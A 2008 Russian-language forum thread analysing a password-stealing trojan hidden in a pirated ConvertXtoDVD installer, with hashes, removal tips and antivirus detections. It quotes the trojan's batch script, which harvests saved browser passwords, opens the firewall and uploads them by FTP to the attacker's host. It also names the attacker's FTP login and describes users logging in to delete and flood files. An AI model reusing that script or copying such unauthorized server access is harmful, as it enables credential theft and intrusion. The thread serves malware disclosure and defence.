комплект троянов маскирующихся под vsoConvertXtoDVD3.1.3.36.ехе (beta)

[VictorVG]

На данный момент о нём известно - имя файла контейнера - фиксированное,
имя архива - может меняться, но вариации не значительны, контрольные
суммы - MD5 и SHA-1, размер, время и дата модификации (штамп времени),
внутренний формат. Берите, что у нас есть и проверяйте на совпадение
данных признаков:

Код:
MD5SUM : b50c6d9bccf5026afa93375f1479b485 *vsoConvertXtoDVD3.1.3.36.exe

SHA-1 : 5f08afbf3c2b8b015b4c8793958076061e607b98 *vsoConvertXtoDVD3.1.3.36.exe

Size: 16652800 byte

Name: vsoConvertXtoDVD3.1.3.36.exe

Время/дата : 02.07.08 23:42

Данный комплект распространяется похоже с Запада - это статистика которую вытащил мой товарищ из списков паролей на сервере. По его словам западные адреса там составляли 90% - 95% адресов машин-отправителей.

Вот, что есть у меня:

Картинка scr1.png - это вид контейнера. Открыт как архив в Far Manager, Scr2.jpg (JPEG портит изображение) - внутрення структура переименованного оригинального инсталлятора открытого в Far как архив, scr3.jpg - то же, но вирусного пакета.

Вот один из первых моих опытов:

2.exe - набор из троянов и руткитов. От меня они ломились куда-то, да фокус не вышел - я эту дрянь запустил на ноуте где винт стоит всего на 5 Гб и сети нету как явления из под BSD + WINE. Понаблюдал сию "мышиную возню", и закрыл лавочку сняв питание. Пара руткитов там сидит, это точно. Формат одного ELF, "заточен" под ядро 2.6.х.х LINUX. Что не удивительно - как платформа LINUX достаточно популярна, и этого кое-кому достаточно.

Эксперимент проводился на старом RoverBook FT5 (C3-800/128 Mb RAM/SiS 315/5 Gb HDD) под FreeBSD 6.3 + WINE 1.0 специально для этого установленными на данную машину.

Вот мой ответ на вопрос одного из пользователей:

В.
"я немного протупил, не прочитал посты что дальше идут и скачал то, что выложили вышеуказанные "товарищи". Но не успел запустить файлы из архива. Как думаешь, трояны ничего не сделали если я их не запускал?"

О.
Если не запускал "инсталлятор", то ничего страшного. С "подарком" можно справится легко: открой в Winrar архив, переименуй установщик в *.cab (в принципе можно и не делать, да так спокойнее) и спокойно вытаскивай оттуда 1.ехе. Потом переименуй его так, как был назван инсталлятор. А *.cab удали из архива. По крайней мере у Nuclears он не блокирован, архивы с 2baksa обычно блокированы. Всё. Зараза обезврежена.

Информация моих товарищей:

"В "инсталляции" 3.1.2.36 - троян. Сама инсталляция представляет собой sfx-архив (WinRar'ом распаковывается). Внутри лончер, оригинальная инсталляция ConvertXtoDVD (1.exe) и "зоопарк" в файле 2.exe. При запуске в темп распаковывается несколько программ из 2.exe и запускаются по очереди. Достаёт пароли с IE и Firefox'а (складывает в темп в простых текстовых файлах), потом эти файлы заливает по ftp (с логином и паролем), предварительно разрешив в фаерволе доступ по FTP без запроса. Нигде себя не прописывает.
Зашёл на тот FTP - там уже тысячи файлов с паролями жертв. Удалил сколько смог."

"Вообще данная версия была выложена на форуме VSO (бета, с исправленными ошибками предыдущего релиза), на оффсайте не выкладывалась. Но на форуме она была чистая - обыкновенная инсталляция, без троянов. Заразу добавили потом, "релиз" с трояном засветился сначала на западе, разошёлся по западным варезникам, а потом уже попал к нам. Так что никто, в общем-то, не виноват.
Судя по географии заражённых машин (статистика с FTP с паролями), 90-95% заражений - запад.
Очень забавно было видеть в файлах с паролями последней строкой адрес какого-нибудь варезника с темой про VSO ConvertXtoDVD. Но меня терзают смутные сомнения, что он используется не только с сабжевой программой.
Насчёт последней официальной версии на сайте VSO - Касперский ругается при попытке её скачивания, но это ошибочное срабатывание, версия чиста.
Официальный представитель VSO отписался по этому поводу на форуме Касперски Лаб в теме по данному трояну.
Вообще троян сделан просто, но довольно прилежно - ни вся сборка в целом, ни каждая отдельная утилита, содержащаяся в нём, ничем не определялись на вирустотале. Единственная ошибка - троянописатели поленились настроить FTP так, чтобы туда можно было заливать файлы, но нельзя было увидеть список уже лежащих там файлов. Тогда вся схема была бы почти идеальна."

[VictorVG]

Вот, обнаружил случайно на 9down в посте sleeptalker информацию, которая думаю окажется полезной:

TROJAN!!!!!

Check yourself. Run the setup. Look in your temp folder for 2.exe and runtime.exe and more. It tries to steal your saved passwords in Firefox and IE.

Setup filesize with trojan 16 652 800 bytes
Setup filesize without trojan 15 528 800 bytes

Here a script that the trojan runs:
@echo off
set restmpdir=C:\Users\\AppData\Local\Temp\bdtmp\
set bfcec=C:\Users\\AppData\Local\Temp\bdtmp\tmp7970.e xe
REM HideSelf
%TEMP%\dependencies.exe >> %TEMP%\%COMPUTERNAME%ff.txt
%TEMP%\runtime.exe /stext %TEMP%\%COMPUTERNAME%ie7.txt
netsh firewall add allowedprogram %SYSTEMROOT%\system32\ftp.exe "File Transfer Protocol" ENABLE
@echo off
set bat=%TEMP%\ftp.dat
echo phynxz>> %bat%
echo cyberraid>> %bat%
echo ascii>> %bat%
echo put %TEMP%\%COMPUTERNAME%ff.txt>> %bat%
echo put %TEMP%\%COMPUTERNAME%ie7.txt>> %bat%
echo quit>> %bat%

ftp -s:%TEMP%\ftp.dat phynxz.vndv.com


I've looked at it more closely. It uses a batch script and two common tools for finding passwords. One of them is this http://www.nirsoft.net/utils/interne..._password.html. I haven't identified the other yet. I discovered it with Kaspersky Internet Security. Not because it identified it as a virus or trojan. It did not. But KIS 2009 asked if it should allow 2.exe to run. I found it strange as the setup was already finished.

I've seen this file spread all over the internet. I've warned some of the sites about it.

I found the login to the hackers ftp that his trojan uses. Here it is.
ip: phynxz.vndv.com
username: phynxz
password: cyberraid

Я только что удалил с данного сайта 178 файлов с паролями и заливаю туда дополнительно ещё 78 Мб мусора - переименованные распакованные драйвера от звуковой платы Audigy 2. Не забью квоту этим - найду другой мусор. Но, факт, что данный сайт работает....

Добавлено через 55 минут

Registrant:
Jack Cator

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: VNDV.COM

Domain servers in listed order:
ns1.vndv.com
ns2.vndv.com

Добавлено через 1 минуту

На данный момент на сервер залито в общей сложности порядка 180 Мб мусора в виде переименованных драйверов и художественной литературу что под руку попалась.

[AndreyKa]

Загрузите файл 2.exe в zip архиве с паролем virus по ссылке:
http://virusinfo.info/upload_virus.php?tid=26052

[VictorVG]

Готово. Файл закачан. Отчёт формы:
Файл сохранён как 080708_015329_virus_48730ee98a183.zip
Размер файла 1071951
MD5 edfcc9b187f978f2789514e2efddb3c7

Могу прислать и образцы паролей скачиваемых данными троянами..

[AndreyKa]

Антивирус Касперского уже детектировал его как Trojan-PSW.Win32.IEPass.a
В лаборатории DrWeb его добавили в базы как Trojan.PWS.Firefox.1

[VictorVG]

AndreyKa

Большое спасибо! Теперь остаётся только дождаться реакции хостера и закрытия сайта владельца трояна.

[VictorVG]

На данный момент удаление списков краденных паролей с данного сайта не возможно - владелец установил аттрибуты доступа rw-r--r--

Добавлено через 4 часа 1 минуту

Проверил данный сервер. Пароль сменили. Значит ждём новую версию трояна. Вот лог FTP:

03:07:46 Статус: Определение IP для phynxz.vndv.com
03:07:46 Статус: Соединяюсь с 207.210.86.252:21...
03:07:46 Статус: Соединение установлено, ожидание приглашения...
03:07:47 Ответ: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
03:07:47 Ответ: 220-You are user number 50 of 250 allowed.
03:07:47 Ответ: 220-Local time is now 14:09. Server port: 21.
03:07:47 Ответ: 220-This is a private system - No anonymous login
03:07:47 Ответ: 220-IPv6 connections are also welcome on this server.
03:07:47 Ответ: 220 You will be disconnected after 2 minutes of inactivity.
03:07:47 Команда: USER phynxz
03:07:47 Ответ: 331 User phynxz OK. Password required
03:07:47 Команда: PASS *********
03:07:47 Ответ: 530 Login authentication failed
03:07:47 Ошибка: Не могу соединиться!
03:08:11 Статус: Определение IP для phynxz.vndv.com
03:08:11 Статус: Соединяюсь с 207.210.86.252:21...
03:08:11 Статус: Соединение установлено, ожидание приглашения...
03:08:13 Ответ: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
03:08:13 Ответ: 220-You are user number 54 of 250 allowed.
03:08:13 Ответ: 220-Local time is now 14:09. Server port: 21.
03:08:13 Ответ: 220-This is a private system - No anonymous login
03:08:13 Ответ: 220-IPv6 connections are also welcome on this server.
03:08:13 Ответ: 220 You will be disconnected after 2 minutes of inactivity.
03:08:13 Команда: USER phynxz
03:08:13 Ответ: 331 User phynxz OK. Password required
03:08:13 Команда: PASS *********
03:08:13 Ответ: 530 Login authentication failed
03:08:13 Ошибка: Не могу соединиться!

[VictorVG]

Сегодня, 11 Июля 2008 года я получил сообщение о добавлении этого вируса в базы ClamAV под именем Trojan.PSW.IEPass

Dear ClamAV user,

The following submissions have been processed and published:
- 3863177 Trojan.PSW.IEPass
- 3879008 Trojan.PSW.IEPass

See http://cvdpedia.clamav.net/daily/7693